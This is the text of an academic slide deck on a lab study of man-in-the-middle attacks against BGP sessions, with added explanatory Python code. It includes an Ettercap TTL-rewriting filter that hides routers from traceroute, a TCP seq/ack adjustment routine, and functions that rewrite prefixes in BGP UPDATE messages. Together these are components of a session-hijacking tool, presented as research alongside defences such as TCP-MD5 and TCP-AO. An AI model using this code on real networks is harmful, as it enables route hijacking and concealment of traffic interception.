A Study in TCP/BGP Session Security
![Page 1: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/1.jpg)
A Study in TCP/BGP Session Security
By Ilias Pallikarakis
![Page 2: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/2.jpg)
Motivation
Inadequate security in BGP
Defcon 16 presentation by Pilosov and Kapela
Is it possible to replicate the attacks using a MitM approach?
![Page 3: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/3.jpg)
BGP Security
Mechanisms currently used: TCP-MD5 (RFC 2385), Generalized TTL Security Mechanism (GTSM, RFC 5082)
Mechanisms to be implemented: TCP-AO (RFC 5925), RPKI (RFC 6480)
Note on scope: TCP-MD5 and TCP-AO authenticate every TCP segment, so an on-path attacker without the shared key cannot alter a protected session; RPKI validates route origin, not the transport. The MitM attacks in this deck therefore target a session without TCP-MD5/TCP-AO. GTSM only checks the TTL a packet arrives with, which is exactly the field the TTL script rewrites.
![Page 4: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/4.jpg)
Defcon 16 Presentation Overview
They successfully advertised fake prefixes (a prefix hijack).
They made the attack hard to detect by making the router advertising the fake prefixes 'invisible' to the traceroute tool.
![Page 5: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/5.jpg)
Main Goals
Set up a MitM position between two routers and attempt to hijack the BGP session
Implement a script similar to the Defcon 16 one to hide part of the network from traceroute
![Page 6: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/6.jpg)
Tools Used
Ettercap: MitM (ARP poisoning), network hiding
Scapy: network hiding, BGP session hijacking
![Page 7: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/7.jpg)
Tools Used
Ettercap:
Easy to use
Good for simple scripts but not for complex ones
No user interaction
Scapy:
Python library
Automatically calculates length/checksum fields
Much slower
![Page 8: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/8.jpg)
Testing Network
![Page 9: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/9.jpg)
General Methodology
Hide network: exploit how traceroute works. Traceroute sends probes with TTL 1, 2, 3, ... and records which router returns ICMP Time Exceeded for each one. A MitM that adds k to the TTL of every probe it forwards makes each probe expire k hops further along, so the k routers behind the MitM never answer and vanish from the trace, which also looks k hops shorter.
BGP session hijacking: intercept the BGP UPDATE messages, find a specific prefix in the NLRI and alter it.
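The traceroute-hiding effect, as an added illustration that is not the deck's Ettercap or Scapy code: a pure-Python model of traceroute across a chain of routers with one transparent on-path host that adds `ttl_boost` to the TTL of every probe it forwards. The router names, target address and MitM position are constructed sample data; the model treats the MitM as a layer-2 forwarder that is not a hop of its own.

```python
# Added illustration (not the deck's Ettercap/Scapy code): a pure-Python model
# of traceroute across a chain of routers with one on-path MitM host that adds
# `ttl_boost` to the TTL of every probe it forwards, as the slide describes.
# Router names, the target address and the hop count are constructed sample data.

def traceroute(routers, dest, mitm_after, ttl_boost, max_ttl=30):
    """Return the address traceroute prints for each probe.

    routers    : on-path routers in order (hop 1 .. n)
    dest       : the target host, after the last router
    mitm_after : the MitM sits on the link after router number `mitm_after`
                 (1-based) and rewrites the TTL of probes heading to dest
    ttl_boost  : how much the MitM adds to the TTL (0 = honest path)
    """
    printed = []
    for ttl in range(1, max_ttl + 1):
        t = ttl
        replier = dest                     # if no router expires it, dest answers
        for hop, router in enumerate(routers, start=1):
            if t <= 1:
                # router decrements to 0: drops probe, sends ICMP Time Exceeded
                replier = router
                break
            t -= 1
            if hop == mitm_after:
                t += ttl_boost             # the filter's ip.ttl += N on the way out
        printed.append(replier)
        if replier == dest:
            break
    return printed


def hidden_routers(routers, dest, mitm_after, ttl_boost):
    """Routers that never appear in the trace because of the TTL rewrite."""
    seen = set(traceroute(routers, dest, mitm_after, ttl_boost))
    return [r for r in routers if r not in seen]


# Constructed topology: six routers, MitM between R2 and R3, boosting by 3.
ROUTERS = ["R1", "R2", "R3", "R4", "R5", "R6"]
TARGET = "1.1.1.1"

if __name__ == "__main__":
    print("honest :", traceroute(ROUTERS, TARGET, 2, 0))
    print("boosted:", traceroute(ROUTERS, TARGET, 2, 3))
    print("hidden :", hidden_routers(ROUTERS, TARGET, 2, 3))
```

With a boost of 3 the trace jumps straight from R2 to R6: R3, R4 and R5 never generate a Time Exceeded because no probe ever expires at them. The same arithmetic is why the boost must equal the number of hops you want to hide.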
![Page 10: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/10.jpg)
BGP Hijacking Issues
Manipulate IP/TCP checksums (they must be recomputed after every change)
Manipulate the variable-length fields that change with the prefix: IP total length, BGP header length, and the UPDATE's own length fields (withdrawn routes length, total path attribute length) when the altered prefix sits in those parts. An NLRI prefix has no length field of its own and runs to the end of the message, so for an NLRI rewrite only the header length changes.
TCP session manipulation (sequence/acknowledgement numbers)
![Page 11: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/11.jpg)
TCP Session Manipulation
What if the altered BGP prefix has a different length than the original?
The two routers then count bytes differently, so the sequence/acknowledgement numbers need to be adjusted. Two options:
Keep the cumulative offset and add/remove it on every segment (best)
Copy the previous sequence number into the next acknowledgement and vice versa (easiest)
![Page 12: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/12.jpg)
Sequence Adjusting Mechanism
The next acknowledgement number (as the original sender expects it) is always the previous sequence number plus the original message's length.
For the sequence number there are two cases:
The previous message was sent by the receiver: use the previous acknowledgement
The previous message was sent by the sender: use the previous forged sequence number
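The "keep the offset and add/remove it" option, as an added example that is not the deck's own Scapy script: one object tracks, per direction, how many bytes the MitM has inserted or removed so far and rewrites the seq/ack of every forwarded segment so that each router still sees a consistent byte stream. The segment values in `demo()` are constructed sample data; the assumption that acknowledgements fall on segment boundaries is stated in the code.

```python
# Added illustration of the slide's "keep the offset and add/remove it" option,
# not the deck's own Scapy script. It tracks, per direction, how many bytes the
# MitM has inserted or removed so far and rewrites seq/ack of every forwarded
# segment so that each router still sees a consistent byte stream.
# The segment values in demo() are constructed sample data.

MASK32 = 0xFFFFFFFF


class SeqAckAdjuster:
    def __init__(self):
        # cumulative (new_len - orig_len) for payloads rewritten in each
        # direction; "a2b" = router A -> router B, "b2a" = the reverse
        self.delta = {"a2b": 0, "b2a": 0}

    def forward(self, direction, seq, ack, orig_len, new_len):
        """Rewrite the seq/ack of a segment travelling in `direction` whose
        payload was changed from orig_len to new_len bytes (equal when the
        segment was left alone). Returns (new_seq, new_ack).

        Assumption: acknowledgements fall on segment boundaries, which holds
        for the small BGP messages in the lab; a partial ack that lands inside
        a rewritten segment has no exact translation."""
        reverse = "b2a" if direction == "a2b" else "a2b"
        # The receiver has seen this direction's stream shifted by everything
        # we already added/removed before this segment.
        new_seq = (seq + self.delta[direction]) & MASK32
        # The ack refers to the peer's stream in its *forged* numbering; map it
        # back to the numbering the peer (the original sender) actually used.
        new_ack = (ack - self.delta[reverse]) & MASK32
        # From now on this direction is shifted by the extra/missing bytes.
        self.delta[direction] += new_len - orig_len
        return new_seq, new_ack


def demo():
    """Constructed exchange: A's first UPDATE grows by 3 bytes, its second
    shrinks by 2; B's segments are forwarded unchanged."""
    adj = SeqAckAdjuster()
    trace = []
    trace.append(adj.forward("a2b", 1000, 5000, 50, 53))  # UPDATE, 50 -> 53 bytes
    trace.append(adj.forward("b2a", 5000, 1053, 19, 19))  # B's KEEPALIVE acks 1053
    trace.append(adj.forward("a2b", 1050, 5019, 40, 38))  # UPDATE, 40 -> 38 bytes
    trace.append(adj.forward("b2a", 5019, 1091, 0, 0))    # pure ACK from B
    return trace


if __name__ == "__main__":
    for seq, ack in demo():
        print("seq=%d ack=%d" % (seq, ack))
```

Note how the acks B sends back (1053, then 1091) are translated to 1050 and 1090 on the way to A, i.e. to "previous sequence plus the original message's length", which is the invariant the slide states. The 32-bit masking keeps the arithmetic correct across a sequence-number wrap.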
![Page 13: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/13.jpg)
Example
![Page 14: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/14.jpg)
Ettercap TTL Script
In one word: simple. The filter adds 3 to the TTL of every packet addressed to the target:

```
if (ip.dst == '1.1.1.1') {
    ip.ttl += 3;
    msg("Increase TTL\n");
}
```

The filter is compiled with etterfilter and loaded with ettercap's -F option while ARP-poisoning the two routers.
![Page 15: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/15.jpg)
Ettercap Script for BGP
Not possible:
The binary payload would have to be matched and edited by hand.
Cannot manipulate variable-length fields.
Can only replace strings of 2-byte length.
![Page 16: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/16.jpg)
Scapy Methodology
Scripts are composed of:
Main: creates the nfqueue (packets are diverted to it by an iptables NFQUEUE rule on the forwarding host) and calls Process
Process: mainly filters packets and calls the altering function
Altering function: varied content, does the packet altering
![Page 17: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/17.jpg)
Scapy BGP Issues
Originally Scapy could not understand multiple BGP UPDATE messages in the same TCP packet: it would read only the first UPDATE, and the length calculation was incorrect.
Unexpected session establishment: while a TCP/BGP session was working, one of the routers attempted to set up a new one.
![Page 18: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/18.jpg)
BGP Issue Solutions
BGP multiple UPDATE messages: use the 16-byte header marker (and the length field that follows it) to find how many messages appear in the payload; modified the original Scapy code for BGP.
Unexpected sessions: drop all packets where one port is 179 and the other one is NOT the working session.
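The two fixes above, together with the length handling from the "BGP Hijacking Issues" slide, as an added example in plain Python that is not the deck's Scapy/nfqueue tool: walk every BGP message in one TCP payload using the 16-byte marker and the header length, replace one NLRI prefix (possibly with a different length), rebuild the messages with corrected header lengths, and apply the port-179 session filter. The sample payload, addresses and port numbers are constructed test data. IP total length and IP/TCP checksums are deliberately left out: in Scapy you delete those fields (`del pkt[IP].len`, `del pkt[IP].chksum`, `del pkt[TCP].chksum`) and they are recomputed on send.

```python
# Added example in plain Python (not the deck's Scapy/nfqueue tool): walk every
# BGP message in one TCP payload using the 16-byte marker and the header length
# (the slide's fix for "multiple UPDATE messages in one packet"), replace one
# NLRI prefix, possibly with a different length, and recompute the BGP header
# length. IP total length and IP/TCP checksums are not touched here.
# The sample payload, addresses and ports below are constructed test data.
import struct
from ipaddress import IPv4Network

MARKER = b"\xff" * 16
BGP_UPDATE, BGP_KEEPALIVE = 2, 4
BGP_PORT = 179


def split_bgp_messages(payload):
    """Return [(type, body), ...] for all BGP messages in a TCP payload."""
    msgs, off = [], 0
    while off < len(payload):
        hdr = payload[off:off + 19]
        if len(hdr) < 19 or hdr[:16] != MARKER:
            raise ValueError("no BGP marker at offset %d" % off)
        length, mtype = struct.unpack("!HB", hdr[16:19])
        if length < 19 or off + length > len(payload):
            raise ValueError("bad BGP length %d at offset %d" % (length, off))
        msgs.append((mtype, payload[off + 19:off + length]))
        off += length
    return msgs


def encode_prefix(net):
    """NLRI entry: 1 byte prefix length, then ceil(len/8) prefix bytes."""
    nbytes = (net.prefixlen + 7) // 8
    return bytes([net.prefixlen]) + net.network_address.packed[:nbytes]


def decode_nlri(data):
    nets, off = [], 0
    while off < len(data):
        plen = data[off]
        nbytes = (plen + 7) // 8
        raw = data[off + 1:off + 1 + nbytes].ljust(4, b"\x00")
        nets.append(IPv4Network((raw, plen)))
        off += 1 + nbytes
    return nets


def parse_update(body):
    """Return (withdrawn_bytes, attrs_bytes, [nlri prefixes]) of an UPDATE."""
    wlen = struct.unpack("!H", body[:2])[0]
    withdrawn = body[2:2 + wlen]
    alen = struct.unpack("!H", body[2 + wlen:4 + wlen])[0]
    attrs = body[4 + wlen:4 + wlen + alen]
    return withdrawn, attrs, decode_nlri(body[4 + wlen + alen:])


def build_update(withdrawn, attrs, nlri):
    """Serialise an UPDATE; the header length is recomputed from the body."""
    body = (struct.pack("!H", len(withdrawn)) + withdrawn
            + struct.pack("!H", len(attrs)) + attrs
            + b"".join(encode_prefix(n) for n in nlri))
    return MARKER + struct.pack("!HB", 19 + len(body), BGP_UPDATE) + body


def rewrite_payload(payload, old, new):
    """Replace prefix `old` by `new` in every UPDATE's NLRI (strings in CIDR
    form). Returns (new_payload, length_delta); the delta is what the seq/ack
    adjustment needs. Non-UPDATE messages are copied unchanged."""
    old, new = IPv4Network(old), IPv4Network(new)
    out = b""
    for mtype, body in split_bgp_messages(payload):
        if mtype == BGP_UPDATE:
            withdrawn, attrs, nlri = parse_update(body)
            out += build_update(withdrawn, attrs, [new if n == old else n for n in nlri])
        else:
            out += MARKER + struct.pack("!HB", 19 + len(body), mtype) + body
    return out, len(out) - len(payload)


def should_drop(sport, dport, session_port):
    """The 'unexpected sessions' filter: a packet touching port 179 whose other
    port is not the working session's port (`session_port`) is dropped."""
    return BGP_PORT in (sport, dport) and session_port not in (sport, dport)


# Constructed sample: UPDATE(10.1.0.0/16) + KEEPALIVE + UPDATE(two /24s) in one
# segment. Minimal mandatory attributes: ORIGIN=IGP, empty AS_PATH, NEXT_HOP.
ATTRS = b"\x40\x01\x01\x00" + b"\x40\x02\x00" + b"\x40\x03\x04" + bytes([10, 0, 0, 1])
SAMPLE = (build_update(b"", ATTRS, [IPv4Network("10.1.0.0/16")])
          + MARKER + struct.pack("!HB", 19, BGP_KEEPALIVE)
          + build_update(b"", ATTRS, [IPv4Network("192.0.2.0/24"),
                                       IPv4Network("198.51.100.0/24")]))

if __name__ == "__main__":
    new, delta = rewrite_payload(SAMPLE, "192.0.2.0/24", "203.0.113.0/25")
    for mtype, body in split_bgp_messages(new):
        print(mtype, parse_update(body)[2] if mtype == BGP_UPDATE else "keepalive")
    print("length delta:", delta)
```

Swapping a /24 for a /25 grows the NLRI entry from 4 to 5 bytes, so the second UPDATE's header length and the TCP payload grow by one byte; swapping the /16 for a /8 shrinks them by one. The returned delta is exactly the per-segment `new_len - orig_len` the sequence adjuster consumes, and the marker-driven walk is what makes the KEEPALIVE and the second UPDATE visible at all when they share a segment with the first.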
![Page 19: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/19.jpg)
Cisco Issue: Description
Strange packets were observed (their form is shown in the slide capture above).
Circumstances of appearance:
Changing the prefix length with incorrect seq/ack numbers
Changing the prefix to a shorter length with the working script (occasionally)
![Page 20: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/20.jpg)
Cisco Issue: Thoughts
Definitely related to the seq/ack numbers. Tests showed that when the ack is larger, the issue always appears. (RFC 793 requires a receiver that gets an acknowledgement for data it has not yet sent, SEG.ACK > SND.NXT, to drop the segment and send an ACK back, so an over-large ack by itself produces extra traffic.)
Why does it appear with the correct script?
![Page 21: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/21.jpg)
Cisco Issue: Thoughts
Test the correct script for a potential mistake
Thoroughly check the TCP flags before the strange packets
Check the strange traffic message by message against the same traffic as sent by the router
![Page 22: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/22.jpg)
Conclusion
Working script (implemented in two different ways!) to increase the TTL. Successful traceroute veil. Because GTSM only checks the TTL a packet arrives with, an on-path MitM that rewrites the TTL passes its check; GTSM offers no protection against this attacker position.
Working TCP adjusting mechanism; it could be used on any TCP communication
![Page 23: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/23.jpg)
Conclusion
Successfully replaced a prefix with one of our choice using Scapy
Contributed to Scapy's BGP layer, allowing multiple UPDATEs to be sent/received
Discovery of the Cisco issue
![Page 24: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/24.jpg)
Tests
Live Demonstration !
![Page 25: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/25.jpg)
Thank You !